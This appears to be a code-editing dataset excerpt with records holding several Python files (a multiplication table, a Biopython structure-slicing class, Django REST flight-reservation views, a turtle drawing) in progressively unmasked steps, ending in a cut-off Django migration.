print(n, ' x ', x, ' = ', n * x)
x = x + 1
<|reserved_special_token_1|>
n=int(input("Enter any int number:\n"))
x=1
while(x<13):
print(n ," x ", x ," = ", n*x)
x=x+1
|
flexible
|
{
"blob_id": "a6c07146f1cbc766cd464dab620d1fb075759c12",
"index": 4213,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x < 13:\n print(n, ' x ', x, ' = ', n * x)\n x = x + 1\n",
"step-3": "n = int(input('Enter any int number:\\n'))\nx = 1\nwhile x < 13:\n print(n, ' x ', x, ' = ', n * x)\n x = x + 1\n",
"step-4": "n=int(input(\"Enter any int number:\\n\"))\n\nx=1\nwhile(x<13):\n print(n ,\" x \", x ,\" = \", n*x)\n x=x+1\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
<|reserved_special_token_0|>
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.
parse(path_to_fasta, 'fasta')]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
from Bio import BiopythonWarning, SeqIO
from Bio.PDB import MMCIFParser, Dice, PDBParser
from Bio.SeqUtils import seq1
import time
import requests
import re
import warnings
warnings.simplefilter('ignore', BiopythonWarning)
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f'Some issues with PDB now. Try again later...\n(URL: {url}')
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.
parse(path_to_fasta, 'fasta')]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0] if
chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1(''.join([residue.get_resname() for residue in
self.chain]))
seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace('-', '')
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[
end_on_indices]
final_seq = [r.get_resname() for r in self.chain.get_residues() if
start <= r.get_id()[1] <= end]
if 'UNK' in final_seq:
with open(out_file, 'w') as f:
f.write('')
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == 'cif':
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir +
f'{pdb_id}.{file_type}')
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
<|reserved_special_token_1|>
from Bio import BiopythonWarning, SeqIO
from Bio.PDB import MMCIFParser, Dice, PDBParser
from Bio.SeqUtils import seq1
import time
import requests
import re
import warnings
warnings.simplefilter('ignore', BiopythonWarning)
def get_response(url):
response = requests.get(url)
cnt = 20
while cnt != 0:
if response.status_code == 200:
return response.content.decode()
else:
time.sleep(1)
cnt -= 1
raise IOError(f"Some issues with PDB now. Try again later...\n(URL: {url}")
def get_seq_names(path_to_fasta):
values = list(zip(*[(str(record.seq), record.id)
for record in SeqIO.parse(path_to_fasta, "fasta")]))
if len(values) == 0:
return []
else:
_, names = values
return names
class Cif:
def get_chain(self):
return [chain for chain in list(self.structure.get_models())[0]
if chain.get_id() == self.chain_id][0]
def get_seq_from_pdb(self):
seq_from_pdb = seq1("".join([residue.get_resname() for residue in self.chain]))
seq_from_pdb = re.search("^X*(.*?)X*$", seq_from_pdb).group(1)
seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]
return seq_from_pdb, seq_from_pdb_ics
def dump_slice(self, motif, out_file):
motif = motif.replace("-", "")
start_on_indices = self.seq.find(motif)
end_on_indices = start_on_indices + len(motif) - 1
start, end = self.indices[start_on_indices], self.indices[end_on_indices]
final_seq = \
[r.get_resname() for r in self.chain.get_residues()
if start <= r.get_id()[1] <= end]
if "UNK" in final_seq:
with open(out_file, "w") as f:
f.write("")
f.flush()
else:
Dice.extract(self.structure, self.chain_id, start, end, out_file)
def __init__(self, pdb_id, chain_id, cif_dir, file_type="cif"):
self.pdb_id = pdb_id
self.chain_id = str(chain_id)
if file_type == "cif":
self.parser = MMCIFParser()
else:
self.parser = PDBParser()
self.structure = self.parser.get_structure(pdb_id, cif_dir + f"{pdb_id}.{file_type}")
self.chain = self.get_chain()
self.seq, self.indices = self.get_seq_from_pdb()
|
flexible
|
{
"blob_id": "ad5cdcfd9d7a3c07abcdcb701422f3c0fdc2b374",
"index": 8860,
"step-1": "<mask token>\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n <mask token>\n",
"step-2": "<mask token>\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\n<mask token>\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-3": "<mask token>\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.\n parse(path_to_fasta, 'fasta')]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-4": "from Bio import BiopythonWarning, SeqIO\nfrom Bio.PDB import MMCIFParser, Dice, PDBParser\nfrom Bio.SeqUtils import seq1\nimport time\nimport requests\nimport re\nimport warnings\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f'Some issues with PDB now. Try again later...\\n(URL: {url}')\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id) for record in SeqIO.\n parse(path_to_fasta, 'fasta')]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0] if \n chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(''.join([residue.get_resname() for residue in\n self.chain]))\n seq_from_pdb = re.search('^X*(.*?)X*$', seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n motif = motif.replace('-', '')\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[\n end_on_indices]\n final_seq = [r.get_resname() for r in self.chain.get_residues() if \n start <= r.get_id()[1] <= end]\n if 'UNK' in final_seq:\n with open(out_file, 'w') as f:\n f.write('')\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type='cif'):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == 'cif':\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir +\n f'{pdb_id}.{file_type}')\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-5": "from Bio import BiopythonWarning, SeqIO\nfrom Bio.PDB import MMCIFParser, Dice, PDBParser\nfrom Bio.SeqUtils import seq1\n\nimport time\nimport requests\nimport re\nimport warnings\n\nwarnings.simplefilter('ignore', BiopythonWarning)\n\n\ndef get_response(url):\n response = requests.get(url)\n cnt = 20\n while cnt != 0:\n if response.status_code == 200:\n return response.content.decode()\n else:\n time.sleep(1)\n cnt -= 1\n raise IOError(f\"Some issues with PDB now. Try again later...\\n(URL: {url}\")\n\n\ndef get_seq_names(path_to_fasta):\n values = list(zip(*[(str(record.seq), record.id)\n for record in SeqIO.parse(path_to_fasta, \"fasta\")]))\n if len(values) == 0:\n return []\n else:\n _, names = values\n return names\n\n\nclass Cif:\n\n def get_chain(self):\n return [chain for chain in list(self.structure.get_models())[0]\n if chain.get_id() == self.chain_id][0]\n\n def get_seq_from_pdb(self):\n seq_from_pdb = seq1(\"\".join([residue.get_resname() for residue in self.chain]))\n seq_from_pdb = re.search(\"^X*(.*?)X*$\", seq_from_pdb).group(1)\n seq_from_pdb_ics = [residue.get_id()[1] for residue in self.chain]\n return seq_from_pdb, seq_from_pdb_ics\n\n def dump_slice(self, motif, out_file):\n\n motif = motif.replace(\"-\", \"\")\n start_on_indices = self.seq.find(motif)\n end_on_indices = start_on_indices + len(motif) - 1\n start, end = self.indices[start_on_indices], self.indices[end_on_indices]\n\n final_seq = \\\n [r.get_resname() for r in self.chain.get_residues()\n if start <= r.get_id()[1] <= end]\n\n if \"UNK\" in final_seq:\n with open(out_file, \"w\") as f:\n f.write(\"\")\n f.flush()\n else:\n Dice.extract(self.structure, self.chain_id, start, end, out_file)\n\n def __init__(self, pdb_id, chain_id, cif_dir, file_type=\"cif\"):\n self.pdb_id = pdb_id\n self.chain_id = str(chain_id)\n if file_type == \"cif\":\n self.parser = MMCIFParser()\n else:\n self.parser = PDBParser()\n self.structure = self.parser.get_structure(pdb_id, cif_dir + f\"{pdb_id}.{file_type}\")\n self.chain = self.get_chain()\n self.seq, self.indices = self.get_seq_from_pdb()\n",
"step-ids": [
4,
6,
7,
9,
10
]
}
|
[
4,
6,
7,
9,
10
] |
../testing.py
|
normal
|
{
"blob_id": "616ff35f818130ebf54bd33f67df79857cd45965",
"index": 6952,
"step-1": "../testing.py",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class Detailedreservation(RetrieveUpdateDestroyAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ListReservation(ListCreateAPIView):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id=bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api_view(['GET'])
def find_flight(request):
bodyData = request.data
req_flight = Flight.objects.filter(departureCity=bodyData[
'departureCity'], arrivalCity=bodyData['arrivalCity'],
dateOfDeparture=bodyData['dateOfDeparture'])
serialized_flight = FlightSerializer(req_flight, many=True)
return Response(serialized_flight.data)
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id=bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
<|reserved_special_token_1|>
from django.shortcuts import render
from rest_framework.response import Response
from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.permissions import IsAuthenticated
from .models import Flight, Passenger, Reservation
from .serializers import FlightSerializer, PassengerSerializer, ReservationSerializer
from rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView
# Function Based Views Below
@api_view(['GET'])
def find_flight(request):
bodyData = request.data
req_flight = Flight.objects.filter(
departureCity = bodyData['departureCity'],
arrivalCity = bodyData['arrivalCity'],
dateOfDeparture = bodyData['dateOfDeparture']
)
serialized_flight = FlightSerializer(req_flight, many=True)
return Response(serialized_flight.data)
@api_view(['POST'])
def save_reservation(request):
bodyData = request.data
req_flight = Flight.objects.get(id= bodyData['flightID'])
req_passenger = Passenger()
req_passenger.firstName = bodyData['firstName']
req_passenger.lastName = bodyData['lastName']
req_passenger.middlename = bodyData['middleName']
req_passenger.email = bodyData['email']
req_passenger.phone = bodyData['phone']
req_passenger.save()
req_reservation = Reservation()
req_reservation.flight = req_flight
req_reservation.passenger = req_passenger
req_reservation.save()
return Response(status=status.HTTP_201_CREATED)
# Non Primary based Operations Below
class ListFlight(ListCreateAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class ListPassengers(ListCreateAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class ListReservation(ListCreateAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
# Primary Key based Operation Below
class DetailedFlight(RetrieveUpdateDestroyAPIView):
queryset = Flight.objects.all()
serializer_class = FlightSerializer
permission_classes = [IsAuthenticated]
class DetailedPassenger(RetrieveUpdateDestroyAPIView):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class Detailedreservation(RetrieveUpdateDestroyAPIView):
queryset = Reservation.objects.all()
serializer_class = ReservationSerializer
|
flexible
|
{
"blob_id": "d437d77d5a57a6f2f4a2d530be05c3845dce93bc",
"index": 1459,
"step-1": "<mask token>\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ListReservation(ListCreateAPIView):\n <mask token>\n <mask token>\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-3": "<mask token>\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id=bodyData['flightID'])\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-4": "<mask token>\n\n\n@api_view(['GET'])\ndef find_flight(request):\n bodyData = request.data\n req_flight = Flight.objects.filter(departureCity=bodyData[\n 'departureCity'], arrivalCity=bodyData['arrivalCity'],\n dateOfDeparture=bodyData['dateOfDeparture'])\n serialized_flight = FlightSerializer(req_flight, many=True)\n return Response(serialized_flight.data)\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id=bodyData['flightID'])\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n return Response(status=status.HTTP_201_CREATED)\n\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n",
"step-5": "from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nfrom rest_framework.permissions import IsAuthenticated\nfrom .models import Flight, Passenger, Reservation\nfrom .serializers import FlightSerializer, PassengerSerializer, ReservationSerializer\nfrom rest_framework.generics import ListCreateAPIView, RetrieveUpdateDestroyAPIView\n\n# Function Based Views Below\n\n@api_view(['GET'])\ndef find_flight(request):\n bodyData = request.data\n req_flight = Flight.objects.filter(\n departureCity = bodyData['departureCity'],\n arrivalCity = bodyData['arrivalCity'],\n dateOfDeparture = bodyData['dateOfDeparture']\n )\n serialized_flight = FlightSerializer(req_flight, many=True)\n return Response(serialized_flight.data)\n\n\n@api_view(['POST'])\ndef save_reservation(request):\n bodyData = request.data\n req_flight = Flight.objects.get(id= bodyData['flightID'])\n\n req_passenger = Passenger()\n req_passenger.firstName = bodyData['firstName']\n req_passenger.lastName = bodyData['lastName']\n req_passenger.middlename = bodyData['middleName']\n req_passenger.email = bodyData['email']\n req_passenger.phone = bodyData['phone']\n req_passenger.save()\n\n req_reservation = Reservation()\n req_reservation.flight = req_flight\n req_reservation.passenger = req_passenger\n req_reservation.save()\n\n return Response(status=status.HTTP_201_CREATED)\n\n\n# Non Primary based Operations Below\n\nclass ListFlight(ListCreateAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\nclass ListPassengers(ListCreateAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\nclass ListReservation(ListCreateAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer\n\n\n# Primary Key based Operation Below \n\n\nclass DetailedFlight(RetrieveUpdateDestroyAPIView):\n queryset = Flight.objects.all()\n serializer_class = FlightSerializer\n permission_classes = [IsAuthenticated]\n\nclass DetailedPassenger(RetrieveUpdateDestroyAPIView):\n queryset = Passenger.objects.all()\n serializer_class = PassengerSerializer\n\nclass Detailedreservation(RetrieveUpdateDestroyAPIView):\n queryset = Reservation.objects.all()\n serializer_class = ReservationSerializer",
"step-ids": [
1,
7,
13,
14,
16
]
}
|
[
1,
7,
13,
14,
16
] |
from turtle import *
def drawSquare():
for i in range(4):
forward(100)
left(90)
if __name__ == '__main__':
drawSquare()
up()
forward(200)
down()
drawSquare()
mainloop()
|
normal
|
{
"blob_id": "1ce5b97148885950983e39b7e99d0cdfafe4bc16",
"index": 5382,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\nif __name__ == '__main__':\n drawSquare()\nup()\nforward(200)\ndown()\ndrawSquare()\nmainloop()\n",
"step-4": "from turtle import *\n\n\ndef drawSquare():\n for i in range(4):\n forward(100)\n left(90)\n\n\nif __name__ == '__main__':\n drawSquare()\nup()\nforward(200)\ndown()\ndrawSquare()\nmainloop()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
# Generated by Django 3.0.7 on 2020-07-05 07:34
from django.db import migrations, models
import location_field.models.plain
class Migration(migrations.Migration):
dependencies = [
